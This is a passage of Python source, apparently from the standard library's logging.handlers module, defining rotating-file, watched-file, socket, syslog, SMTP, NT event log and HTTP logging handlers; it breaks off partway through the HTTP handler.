based on PEP 282 and comments thereto in comp.lang.python.
Copyright (C) 2001-2016 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging.handlers' and log away!
"""
import logging, socket, os, pickle, struct, time, re
from stat import ST_DEV, ST_INO, ST_MTIME
import queue
import threading
import copy
#
# Some constants...
#
DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514
_MIDNIGHT = 24 * 60 * 60 # number of seconds in a day
class BaseRotatingHandler(logging.FileHandler):
"""
Base class for handlers that rotate log files at a certain point.
Not meant to be instantiated directly. Instead, use RotatingFileHandler
or TimedRotatingFileHandler.
"""
namer = None
rotator = None
def __init__(self, filename, mode, encoding=None, delay=False, errors=None):
"""
Use the specified filename for streamed logging
"""
logging.FileHandler.__init__(self, filename, mode=mode,
encoding=encoding, delay=delay,
errors=errors)
self.mode = mode
self.encoding = encoding
self.errors = errors
def emit(self, record):
"""
Emit a record.
Output the record to the file, catering for rollover as described
in doRollover().
"""
try:
if self.shouldRollover(record):
self.doRollover()
logging.FileHandler.emit(self, record)
except Exception:
self.handleError(record)
def rotation_filename(self, default_name):
"""
Modify the filename of a log file when rotating.
This is provided so that a custom filename can be provided.
The default implementation calls the 'namer' attribute of the
handler, if it's callable, passing the default name to
it. If the attribute isn't callable (the default is None), the name
is returned unchanged.
:param default_name: The default name for the log file.
"""
if not callable(self.namer):
result = default_name
else:
result = self.namer(default_name)
return result
def rotate(self, source, dest):
"""
When rotating, rotate the current log.
The default implementation calls the 'rotator' attribute of the
handler, if it's callable, passing the source and dest arguments to
it. If the attribute isn't callable (the default is None), the source
is simply renamed to the destination.
:param source: The source filename. This is normally the base
filename, e.g. 'test.log'
:param dest: The destination filename. This is normally
what the source is rotated to, e.g. 'test.log.1'.
"""
if not callable(self.rotator):
# Issue 18940: A file may not have been created if delay is True.
if os.path.exists(source):
os.rename(source, dest)
else:
self.rotator(source, dest)
class RotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a set of files, which switches from one file
to the next when the current file reaches a certain size.
"""
def __init__(self, filename, mode='a', maxBytes=0, backupCount=0,
encoding=None, delay=False, errors=None):
"""
Open the specified file and use it as the stream for logging.
By default, the file grows indefinitely. You can specify particular
values of maxBytes and backupCount to allow the file to rollover at
a predetermined size.
Rollover occurs whenever the current log file is nearly maxBytes in
length. If backupCount is >= 1, the system will successively create
new files with the same pathname as the base file, but with extensions
".1", ".2" etc. appended to it. For example, with a backupCount of 5
and a base file name of "app.log", you would get "app.log",
"app.log.1", "app.log.2", ... through to "app.log.5". The file being
written to is always "app.log" - when it gets filled up, it is closed
and renamed to "app.log.1", and if files "app.log.1", "app.log.2" etc.
exist, then they are renamed to "app.log.2", "app.log.3" etc.
respectively.
If maxBytes is zero, rollover never occurs.
"""
# If rotation/rollover is wanted, it doesn't make sense to use another
# mode. If for example 'w' were specified, then if there were multiple
# runs of the calling application, the logs from previous runs would be
# lost if the 'w' is respected, because the log file would be truncated
# on each run.
if maxBytes > 0:
mode = 'a'
BaseRotatingHandler.__init__(self, filename, mode, encoding=encoding,
delay=delay, errors=errors)
self.maxBytes = maxBytes
self.backupCount = backupCount
def doRollover(self):
"""
Do a rollover, as described in __init__().
"""
if self.stream:
self.stream.close()
self.stream = None
if self.backupCount > 0:
for i in range(self.backupCount - 1, 0, -1):
sfn = self.rotation_filename("%s.%d" % (self.baseFilename, i))
dfn = self.rotation_filename("%s.%d" % (self.baseFilename,
i + 1))
if os.path.exists(sfn):
if os.path.exists(dfn):
os.remove(dfn)
os.rename(sfn, dfn)
dfn = self.rotation_filename(self.baseFilename + ".1")
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if not self.delay:
self.stream = self._open()
def shouldRollover(self, record):
"""
Determine if rollover should occur.
Basically, see if the supplied record would cause the file to exceed
the size limit we have.
"""
if self.stream is None: # delay was set...
self.stream = self._open()
if self.maxBytes > 0: # are we rolling over?
msg = "%s\n" % self.format(record)
self.stream.seek(0, 2) #due to non-posix-compliant Windows feature
if self.stream.tell() + len(msg) >= self.maxBytes:
return 1
return 0
class TimedRotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a file, rotating the log file at certain timed
intervals.
If backupCount is > 0, when rollover is done, no more than backupCount
files are kept - the oldest ones are deleted.
"""
def __init__(self, filename, when='h', interval=1, backupCount=0,
encoding=None, delay=False, utc=False, atTime=None,
errors=None):
BaseRotatingHandler.__init__(self, filename, 'a', encoding=encoding,
delay=delay, errors=errors)
self.when = when.upper()
self.backupCount = backupCount
self.utc = utc
self.atTime = atTime
# Calculate the real rollover interval, which is just the number of
# seconds between rollovers. Also set the filename suffix used when
# a rollover occurs. Current 'when' events supported:
# S - Seconds
# M - Minutes
# H - Hours
# D - Days
# midnight - roll over at midnight
# W{0-6} - roll over on a certain day; 0 - Monday
#
# Case of the 'when' specifier is not important; lower or upper case
# will work.
if self.when == 'S':
self.interval = 1 # one second
self.suffix = "%Y-%m-%d_%H-%M-%S"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'M':
self.interval = 60 # one minute
self.suffix = "%Y-%m-%d_%H-%M"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'H':
self.interval = 60 * 60 # one hour
self.suffix = "%Y-%m-%d_%H"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}(\.\w+)?$"
elif self.when == 'D' or self.when == 'MIDNIGHT':
self.interval = 60 * 60 * 24 # one day
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
elif self.when.startswith('W'):
self.interval = 60 * 60 * 24 * 7 # one week
if len(self.when) != 2:
raise ValueError("You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s" % self.when)
if self.when[1] < '0' or self.when[1] > '6':
raise ValueError("Invalid day specified for weekly rollover: %s" % self.when)
self.dayOfWeek = int(self.when[1])
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
else:
raise ValueError("Invalid rollover interval specified: %s" % self.when)
self.extMatch = re.compile(self.extMatch, re.ASCII)
self.interval = self.interval * interval # multiply by units requested
# The following line added because the filename passed in could be a
# path object (see Issue #27493), but self.baseFilename will be a string
filename = self.baseFilename
if os.path.exists(filename):
t = os.stat(filename)[ST_MTIME]
else:
t = int(time.time())
self.rolloverAt = self.computeRollover(t)
def computeRollover(self, currentTime):
"""
Work out the rollover time based on the specified time.
"""
result = currentTime + self.interval
# If we are rolling over at midnight or weekly, then the interval is already known.
# What we need to figure out is WHEN the next interval is. In other words,
# if you are rolling over at midnight, then your base interval is 1 day,
# but you want to start that one day clock at midnight, not now. So, we
# have to fudge the rolloverAt value in order to trigger the first rollover
# at the right time. After that, the regular interval will take care of
# the rest. Note that this code doesn't care about leap seconds. :)
if self.when == 'MIDNIGHT' or self.when.startswith('W'):
# This could be done with less code, but I wanted it to be clear
if self.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
currentDay = t[6]
# r is the number of seconds left between now and the next rotation
if self.atTime is None:
rotate_ts = _MIDNIGHT
else:
rotate_ts = ((self.atTime.hour * 60 + self.atTime.minute)*60 +
self.atTime.second)
r = rotate_ts - ((currentHour * 60 + currentMinute) * 60 +
currentSecond)
if r < 0:
# Rotate time is before the current time (for example when
# self.rotateAt is 13:45 and it now 14:15), rotation is
# tomorrow.
r += _MIDNIGHT
currentDay = (currentDay + 1) % 7
result = currentTime + r
# If we are rolling over on a certain day, add in the number of days until
# the next rollover, but offset by 1 since we just calculated the time
# until the next day starts. There are three cases:
# Case 1) The day to rollover is today; in this case, do nothing
# Case 2) The day to rollover is further in the interval (i.e., today is
# day 2 (Wednesday) and rollover is on day 6 (Sunday). Days to
# next rollover is simply 6 - 2 - 1, or 3.
# Case 3) The day to rollover is behind us in the interval (i.e., today
# is day 5 (Saturday) and rollover is on day 3 (Thursday).
# Days to rollover is 6 - 5 + 3, or 4. In this case, it's the
# number of days left in the current week (1) plus the number
# of days in the next week until the rollover day (3).
# The calculations described in 2) and 3) above need to have a day added.
# This is because the above time calculation takes us to midnight on this
# day, i.e. the start of the next day.
if self.when.startswith('W'):
day = currentDay # 0 is Monday
if day != self.dayOfWeek:
if day < self.dayOfWeek:
daysToWait = self.dayOfWeek - day
else:
daysToWait = 6 - day + self.dayOfWeek + 1
newRolloverAt = result + (daysToWait * (60 * 60 * 24))
if not self.utc:
dstNow = t[-1]
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
result = newRolloverAt
return result
def shouldRollover(self, record):
"""
Determine if rollover should occur.
record is not used, as we are just comparing times, but it is needed so
the method signatures are the same
"""
t = int(time.time())
if t >= self.rolloverAt:
return 1
return 0
def getFilesToDelete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dirName, baseName = os.path.split(self.baseFilename)
fileNames = os.listdir(dirName)
result = []
prefix = baseName + "."
plen = len(prefix)
for fileName in fileNames:
if fileName[:plen] == prefix:
suffix = fileName[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirName, fileName))
if len(result) < self.backupCount:
result = []
else:
result.sort()
result = result[:len(result) - self.backupCount]
return result
def doRollover(self):
"""
do a rollover; in this case, a date/time stamp is appended to the filename
when the rollover happens. However, you want the file to be named for the
start of the interval, not the current time. If there is a backup count,
then we have to get a list of matching filenames, sort them and remove
the one with the oldest suffix.
"""
if self.stream:
self.stream.close()
self.stream = None
# get the time that this sequence started at and make it a TimeTuple
currentTime = int(time.time())
dstNow = time.localtime(currentTime)[-1]
t = self.rolloverAt - self.interval
if self.utc:
timeTuple = time.gmtime(t)
else:
timeTuple = time.localtime(t)
dstThen = timeTuple[-1]
if dstNow != dstThen:
if dstNow:
addend = 3600
else:
addend = -3600
timeTuple = time.localtime(t + addend)
dfn = self.rotation_filename(self.baseFilename + "." +
time.strftime(self.suffix, timeTuple))
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if self.backupCount > 0:
for s in self.getFilesToDelete():
os.remove(s)
if not self.delay:
self.stream = self._open()
newRolloverAt = self.computeRollover(currentTime)
while newRolloverAt <= currentTime:
newRolloverAt = newRolloverAt + self.interval
#If DST changes and midnight or weekly rollover, adjust for this.
if (self.when == 'MIDNIGHT' or self.when.startswith('W')) and not self.utc:
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
self.rolloverAt = newRolloverAt
class WatchedFileHandler(logging.FileHandler):
"""
A handler for logging to a file, which watches the file
to see if it has changed while in use. This can happen because of
usage of programs such as newsyslog and logrotate which perform
log file rotation. This handler, intended for use under Unix,
watches the file to see if it has changed since the last emit.
(A file has changed if its device or inode have changed.)
If it has changed, the old file stream is closed, and the file
opened to get a new stream.
This handler is not appropriate for use under Windows, because
under Windows open files cannot be moved or renamed - logging
opens the files with exclusive locks - and so there is no need
for such a handler. Furthermore, ST_INO is not supported under
Windows; stat always returns zero for this value.
This handler is based on a suggestion and patch by Chad J.
Schroeder.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False,
errors=None):
logging.FileHandler.__init__(self, filename, mode=mode,
encoding=encoding, delay=delay,
errors=errors)
self.dev, self.ino = -1, -1
self._statstream()
def _statstream(self):
if self.stream:
sres = os.fstat(self.stream.fileno())
self.dev, self.ino = sres[ST_DEV], sres[ST_INO]
def reopenIfNeeded(self):
"""
Reopen log file if needed.
Checks if the underlying file has changed, and if it
has, close the old stream and reopen the file to get the
current stream.
"""
# Reduce the chance of race conditions by stat'ing by path only
# once and then fstat'ing our new fd if we opened a new log stream.
# See issue #14632: Thanks to John Mulligan for the problem report
# and patch.
try:
# stat the file by path, checking for existence
sres = os.stat(self.baseFilename)
except FileNotFoundError:
sres = None
# compare file system stat with that of our stream file handle
if not sres or sres[ST_DEV] != self.dev or sres[ST_INO] != self.ino:
if self.stream is not None:
# we have an open file handle, clean it up
self.stream.flush()
self.stream.close()
self.stream = None # See Issue #21742: _open () might fail.
# open a new file handle and get new stat info from that fd
self.stream = self._open()
self._statstream()
def emit(self, record):
"""
Emit a record.
If underlying file has changed, reopen the file before emitting the
record to it.
"""
self.reopenIfNeeded()
logging.FileHandler.emit(self, record)
class SocketHandler(logging.Handler):
"""
A handler class which writes logging records, in pickle format, to
a streaming socket. The socket is kept open across logging calls.
If the peer resets it, an attempt is made to reconnect on the next call.
The pickle which is sent is that of the LogRecord's attribute dictionary
(__dict__), so that the receiver does not need to have the logging module
installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
When the attribute *closeOnError* is set to True - if a socket error
occurs, the socket is silently closed and then reopened on the next
logging call.
"""
logging.Handler.__init__(self)
self.host = host
self.port = port
if port is None:
self.address = host
else:
self.address = (host, port)
self.sock = None
self.closeOnError = False
self.retryTime = None
#
# Exponential backoff parameters.
#
self.retryStart = 1.0
self.retryMax = 30.0
self.retryFactor = 2.0
def makeSocket(self, timeout=1):
"""
A factory method which allows subclasses to define the precise
type of socket they want.
"""
if self.port is not None:
result = socket.create_connection(self.address, timeout=timeout)
else:
result = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
result.settimeout(timeout)
try:
result.connect(self.address)
except OSError:
result.close() # Issue 19182
raise
return result
def createSocket(self):
"""
Try to create a socket, using an exponential backoff with
a max retry time. Thanks to Robert Olson for the original patch
(SF #815911) which has been slightly refactored.
"""
now = time.time()
# Either retryTime is None, in which case this
# is the first time back after a disconnect, or
# we've waited long enough.
if self.retryTime is None:
attempt = True
else:
attempt = (now >= self.retryTime)
if attempt:
try:
self.sock = self.makeSocket()
self.retryTime = None # next time, no delay before trying
except OSError:
#Creation failed, so set the retry time and return.
if self.retryTime is None:
self.retryPeriod = self.retryStart
else:
self.retryPeriod = self.retryPeriod * self.retryFactor
if self.retryPeriod > self.retryMax:
self.retryPeriod = self.retryMax
self.retryTime = now + self.retryPeriod
def send(self, s):
"""
Send a pickled string to the socket.
This function allows for partial sends which can happen when the
network is busy.
"""
if self.sock is None:
self.createSocket()
#self.sock can be None either because we haven't reached the retry
#time yet, or because we have reached the retry time and retried,
#but are still unable to connect.
if self.sock:
try:
self.sock.sendall(s)
except OSError: #pragma: no cover
self.sock.close()
self.sock = None # so we can call createSocket next time
def makePickle(self, record):
"""
Pickles the record in binary format with a length prefix, and
returns it ready for transmission across the socket.
"""
ei = record.exc_info
if ei:
# just to get traceback text into record.exc_text ...
dummy = self.format(record)
# See issue #14436: If msg or args are objects, they may not be
# available on the receiving end. So we convert the msg % args
# to a string, save it as msg and zap the args.
d = dict(record.__dict__)
d['msg'] = record.getMessage()
d['args'] = None
d['exc_info'] = None
# Issue #25685: delete 'message' if present: redundant with 'msg'
d.pop('message', None)
s = pickle.dumps(d, 1)
slen = struct.pack(">L", len(s))
return slen + s
def handleError(self, record):
"""
Handle an error during logging.
An error has occurred during logging. Most likely cause -
connection lost. Close the socket so that we can retry on the
next event.
"""
if self.closeOnError and self.sock:
self.sock.close()
self.sock = None #try to reconnect next time
else:
logging.Handler.handleError(self, record)
def emit(self, record):
"""
Emit a record.
Pickles the record and writes it to the socket in binary format.
If there is an error with the socket, silently drop the packet.
If there was a problem with the socket, re-establishes the
socket.
"""
try:
s = self.makePickle(record)
self.send(s)
except Exception:
self.handleError(record)
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
sock = self.sock
if sock:
self.sock = None
sock.close()
logging.Handler.close(self)
finally:
self.release()
class DatagramHandler(SocketHandler):
"""
A handler class which writes logging records, in pickle format, to
a datagram socket. The pickle which is sent is that of the LogRecord's
attribute dictionary (__dict__), so that the receiver does not need to
have the logging module installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
"""
SocketHandler.__init__(self, host, port)
self.closeOnError = False
def makeSocket(self):
"""
The factory method of SocketHandler is here overridden to create
a UDP socket (SOCK_DGRAM).
"""
if self.port is None:
family = socket.AF_UNIX
else:
family = socket.AF_INET
s = socket.socket(family, socket.SOCK_DGRAM)
return s
def send(self, s):
"""
Send a pickled string to a socket.
This function no longer allows for partial sends which can happen
when the network is busy - UDP does not guarantee delivery and
can deliver packets out of sequence.
"""
if self.sock is None:
self.createSocket()
self.sock.sendto(s, self.address)
class SysLogHandler(logging.Handler):
"""
A handler class which sends formatted logging records to a syslog
server. Based on Sam Rushing's syslog module:
http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Contributed by Nicolas Untz (after which minor refactoring changes
have been made).
"""
# from <linux/sys/syslog.h>:
# ======================================================================
# priorities/facilities are encoded into a single 32-bit quantity, where
# the bottom 3 bits are the priority (0-7) and the top 28 bits are the
# facility (0-big number). Both the priorities and the facilities map
# roughly one-to-one to strings in the syslogd(8) source code. This
# mapping is included in this file.
#
# priorities (these are ordered)
LOG_EMERG = 0 # system is unusable
LOG_ALERT = 1 # action must be taken immediately
LOG_CRIT = 2 # critical conditions
LOG_ERR = 3 # error conditions
LOG_WARNING = 4 # warning conditions
LOG_NOTICE = 5 # normal but significant condition
LOG_INFO = 6 # informational
LOG_DEBUG = 7 # debug-level messages
# facility codes
LOG_KERN = 0 # kernel messages
LOG_USER = 1 # random user-level messages
LOG_MAIL = 2 # mail system
LOG_DAEMON = 3 # system daemons
LOG_AUTH = 4 # security/authorization messages
LOG_SYSLOG = 5 # messages generated internally by syslogd
LOG_LPR = 6 # line printer subsystem
LOG_NEWS = 7 # network news subsystem
LOG_UUCP = 8 # UUCP subsystem
LOG_CRON = 9 # clock daemon
LOG_AUTHPRIV = 10 # security/authorization messages (private)
LOG_FTP = 11 # FTP daemon
LOG_NTP = 12 # NTP subsystem
LOG_SECURITY = 13 # Log audit
LOG_CONSOLE = 14 # Log alert
LOG_SOLCRON = 15 # Scheduling daemon (Solaris)
# other codes through 15 reserved for system use
LOG_LOCAL0 = 16 # reserved for local use
LOG_LOCAL1 = 17 # reserved for local use
LOG_LOCAL2 = 18 # reserved for local use
LOG_LOCAL3 = 19 # reserved for local use
LOG_LOCAL4 = 20 # reserved for local use
LOG_LOCAL5 = 21 # reserved for local use
LOG_LOCAL6 = 22 # reserved for local use
LOG_LOCAL7 = 23 # reserved for local use
priority_names = {
"alert": LOG_ALERT,
"crit": LOG_CRIT,
"critical": LOG_CRIT,
"debug": LOG_DEBUG,
"emerg": LOG_EMERG,
"err": LOG_ERR,
"error": LOG_ERR, # DEPRECATED
"info": LOG_INFO,
"notice": LOG_NOTICE,
"panic": LOG_EMERG, # DEPRECATED
"warn": LOG_WARNING, # DEPRECATED
"warning": LOG_WARNING,
}
facility_names = {
"auth": LOG_AUTH,
"authpriv": LOG_AUTHPRIV,
"console": LOG_CONSOLE,
"cron": LOG_CRON,
"daemon": LOG_DAEMON,
"ftp": LOG_FTP,
"kern": LOG_KERN,
"lpr": LOG_LPR,
"mail": LOG_MAIL,
"news": LOG_NEWS,
"ntp": LOG_NTP,
"security": LOG_SECURITY,
"solaris-cron": LOG_SOLCRON,
"syslog": LOG_SYSLOG,
"user": LOG_USER,
"uucp": LOG_UUCP,
"local0": LOG_LOCAL0,
"local1": LOG_LOCAL1,
"local2": LOG_LOCAL2,
"local3": LOG_LOCAL3,
"local4": LOG_LOCAL4,
"local5": LOG_LOCAL5,
"local6": LOG_LOCAL6,
"local7": LOG_LOCAL7,
}
#The map below appears to be trivially lowercasing the key. However,
#there's more to it than meets the eye - in some locales, lowercasing
#gives unexpected results. See SF #1524081: in the Turkish locale,
#"INFO".lower() != "info"
priority_map = {
"DEBUG" : "debug",
"INFO" : "info",
"WARNING" : "warning",
"ERROR" : "error",
"CRITICAL" : "critical"
}
def __init__(self, address=('localhost', SYSLOG_UDP_PORT),
facility=LOG_USER, socktype=None):
"""
Initialize a handler.
If address is specified as a string, a UNIX socket is used. To log to a
local syslogd, "SysLogHandler(address="/dev/log")" can be used.
If facility is not specified, LOG_USER is used. If socktype is
specified as socket.SOCK_DGRAM or socket.SOCK_STREAM, that specific
socket type will be used. For Unix sockets, you can also specify a
socktype of None, in which case socket.SOCK_DGRAM will be used, falling
back to socket.SOCK_STREAM.
"""
logging.Handler.__init__(self)
self.address = address
self.facility = facility
self.socktype = socktype
if isinstance(address, str):
self.unixsocket = True
# Syslog server may be unavailable during handler initialisation.
# C's openlog() function also ignores connection errors.
# Moreover, we ignore these errors while logging, so it not worse
# to ignore it also here.
try:
self._connect_unixsocket(address)
except OSError:
pass
else:
self.unixsocket = False
if socktype is None:
socktype = socket.SOCK_DGRAM
host, port = address
ress = socket.getaddrinfo(host, port, 0, socktype)
if not ress:
raise OSError("getaddrinfo returns an empty list")
for res in ress:
af, socktype, proto, _, sa = res
err = sock = None
try:
sock = socket.socket(af, socktype, proto)
if socktype == socket.SOCK_STREAM:
sock.connect(sa)
break
except OSError as exc:
err = exc
if sock is not None:
sock.close()
if err is not None:
raise err
self.socket = sock
self.socktype = socktype
def _connect_unixsocket(self, address):
use_socktype = self.socktype
if use_socktype is None:
use_socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
if self.socktype is not None:
# user didn't specify falling back, so fail
raise
use_socktype = socket.SOCK_STREAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
raise
def encodePriority(self, facility, priority):
"""
Encode the facility and priority. You can pass in strings or
integers - if strings are passed, the facility_names and
priority_names mapping dictionaries are used to convert them to
integers.
"""
if isinstance(facility, str):
facility = self.facility_names[facility]
if isinstance(priority, str):
priority = self.priority_names[priority]
return (facility << 3) | priority
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
self.socket.close()
logging.Handler.close(self)
finally:
self.release()
def mapPriority(self, levelName):
"""
Map a logging level name to a key in the priority_names map.
This is useful in two scenarios: when custom levels are being
used, and in the case where you can't do a straightforward
mapping by lowercasing the logging level name because of locale-
specific issues (see SF #1524081).
"""
return self.priority_map.get(levelName, "warning")
ident = '' # prepended to all messages
append_nul = True # some old syslog daemons expect a NUL terminator
def emit(self, record):
"""
Emit a record.
The record is formatted, and then sent to the syslog server. If
exception information is present, it is NOT sent to the server.
"""
try:
msg = self.format(record)
if self.ident:
msg = self.ident + msg
if self.append_nul:
msg += '\000'
# We need to convert record level to lowercase, maybe this will
# change in the future.
prio = '<%d>' % self.encodePriority(self.facility,
self.mapPriority(record.levelname))
prio = prio.encode('utf-8')
# Message is a string. Convert to bytes as required by RFC 5424
msg = msg.encode('utf-8')
msg = prio + msg
if self.unixsocket:
try:
self.socket.send(msg)
except OSError:
self.socket.close()
self._connect_unixsocket(self.address)
self.socket.send(msg)
elif self.socktype == socket.SOCK_DGRAM:
self.socket.sendto(msg, self.address)
else:
self.socket.sendall(msg)
except Exception:
self.handleError(record)
class SMTPHandler(logging.Handler):
"""
A handler class which sends an SMTP email for each logging event.
"""
def __init__(self, mailhost, fromaddr, toaddrs, subject,
credentials=None, secure=None, timeout=5.0):
"""
Initialize the handler.
Initialize the instance with the from and to addresses and subject
line of the email. To specify a non-standard SMTP port, use the
(host, port) tuple format for the mailhost argument. To specify
authentication credentials, supply a (username, password) tuple
for the credentials argument. To specify the use of a secure
protocol (TLS), pass in a tuple for the secure argument. This will
only be used when authentication credentials are supplied. The tuple
will be either an empty tuple, or a single-value tuple with the name
of a keyfile, or a 2-value tuple with the names of the keyfile and
certificate file. (This tuple is passed to the `starttls` method).
A timeout in seconds can be specified for the SMTP connection (the
default is one second).
"""
logging.Handler.__init__(self)
if isinstance(mailhost, (list, tuple)):
self.mailhost, self.mailport = mailhost
else:
self.mailhost, self.mailport = mailhost, None
if isinstance(credentials, (list, tuple)):
self.username, self.password = credentials
else:
self.username = None
self.fromaddr = fromaddr
if isinstance(toaddrs, str):
toaddrs = [toaddrs]
self.toaddrs = toaddrs
self.subject = subject
self.secure = secure
self.timeout = timeout
def getSubject(self, record):
"""
Determine the subject for the email.
If you want to specify a subject line which is record-dependent,
override this method.
"""
return self.subject
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
"""
try:
import smtplib
from email.message import EmailMessage
import email.utils
port = self.mailport
if not port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
msg = EmailMessage()
msg['From'] = self.fromaddr
msg['To'] = ','.join(self.toaddrs)
msg['Subject'] = self.getSubject(record)
msg['Date'] = email.utils.localtime()
msg.set_content(self.format(record))
if self.username:
if self.secure is not None:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.send_message(msg)
smtp.quit()
except Exception:
self.handleError(record)
class NTEventLogHandler(logging.Handler):
"""
A handler class which sends events to the NT Event Log. Adds a
registry entry for the specified application name. If no dllname is
provided, win32service.pyd (which contains some basic message
placeholders) is used. Note that use of these placeholders will make
your event logs big, as the entire message source is held in the log.
If you want slimmer logs, you have to pass in the name of your own DLL
which contains the message definitions you want to use in the event log.
"""
def __init__(self, appname, dllname=None, logtype="Application"):
logging.Handler.__init__(self)
try:
import win32evtlogutil, win32evtlog
self.appname = appname
self._welu = win32evtlogutil
if not dllname:
dllname = os.path.split(self._welu.__file__)
dllname = os.path.split(dllname[0])
dllname = os.path.join(dllname[0], r'win32service.pyd')
self.dllname = dllname
self.logtype = logtype
self._welu.AddSourceToRegistry(appname, dllname, logtype)
self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
self.typemap = {
logging.DEBUG : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.INFO : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.WARNING : win32evtlog.EVENTLOG_WARNING_TYPE,
logging.ERROR : win32evtlog.EVENTLOG_ERROR_TYPE,
logging.CRITICAL: win32evtlog.EVENTLOG_ERROR_TYPE,
}
except ImportError:
print("The Python Win32 extensions for NT (service, event "\
"logging) appear not to be available.")
self._welu = None
def getMessageID(self, record):
"""
Return the message ID for the event record. If you are using your
own messages, you could do this by having the msg passed to the
logger being an ID rather than a formatting string. Then, in here,
you could use a dictionary lookup to get the message ID. This
version returns 1, which is the base message ID in win32service.pyd.
"""
return 1
def getEventCategory(self, record):
"""
Return the event category for the record.
Override this if you want to specify your own categories. This version
returns 0.
"""
return 0
def getEventType(self, record):
"""
Return the event type for the record.
Override this if you want to specify your own types. This version does
a mapping using the handler's typemap attribute, which is set up in
__init__() to a dictionary which contains mappings for DEBUG, INFO,
WARNING, ERROR and CRITICAL. If you are using your own levels you will
either need to override this method or place a suitable dictionary in
the handler's typemap attribute.
"""
return self.typemap.get(record.levelno, self.deftype)
def emit(self, record):
"""
Emit a record.
Determine the message ID, event category and event type. Then
log the message in the NT event log.
"""
if self._welu:
try:
id = self.getMessageID(record)
cat = self.getEventCategory(record)
type = self.getEventType(record)
msg = self.format(record)
self._welu.ReportEvent(self.appname, id, cat, type, [msg])
except Exception:
self.handleError(record)
def close(self):
"""
Clean up this handler.
You can remove the application name from the registry as a
source of event log entries. However, if you do this, you will
not be able to see the events as you intended in the Event Log
Viewer - it needs to be able to access the registry to get the
DLL name.
"""
#self._welu.RemoveSourceFromRegistry(self.appname, self.logtype)
logging.Handler.close(self)
class HTTPHandler(logging.Handler):
"""
A class which sends records to a Web server, using either GET or
POST semantics.
"""
def __init__(self, host, url, method="GET", secure=False, credentials=None,
context=None):
"""
Initialize the instance with the host, the request URL, and the method
("GET" or "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
if method not in ["GET", "POST"]:
raise ValueError("method must be GET or POST")
if not secure and context is not None:
raise ValueError("context parameter only makes sense "
"with secure=True")
self.host = host
self.url = url
self.method = method
self.secure = secure
self.credentials = credentials
self.context = context
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
that is sent as the CGI data. Overwrite in your class.
Contributed by Franz Glasner.
"""
return record.__dict__
def getConnection(self, host, secure):
"""
get a HTTP[S]Connection.
Override when a custom connection is required, for example if
there is a proxy.
"""
import http.client
if secure:
connection = http.client.HTTPSConnection(host, context=self.context)
else:
connection = http.client.HTTPConnection(host)
return connection
def emit(self, record):
"""
Emit a record.
Send the record to the Web server as a percent-encoded dictionary
"""
try:
import urllib.parse
host = self.host
h = self.getConnection(host, self.secure)
url = self.url
data = urllib.parse.urlencode(self.mapLogRecord(record))
if self.method == "GET":
if (url.find('?') >= 0):
sep = '&'
else:
sep = '?'
url = url + "%c%s" % (sep, data)
h.putrequest(self.method, url)
# support multiple hosts on one IP address...
# need to strip optional :port from host, if present
i = host.find(":")
if i >= 0:
host = host[:i]
# See issue #30904: putrequest call above already adds this header
# on Python 3.x.
# h.putheader("Host", host)
if self.method == "POST":
h.putheader("Content-type",
"application/x-www-form-urlencoded")
h.putheader("Content-length", str(len(data)))
if self.credentials:
import base64
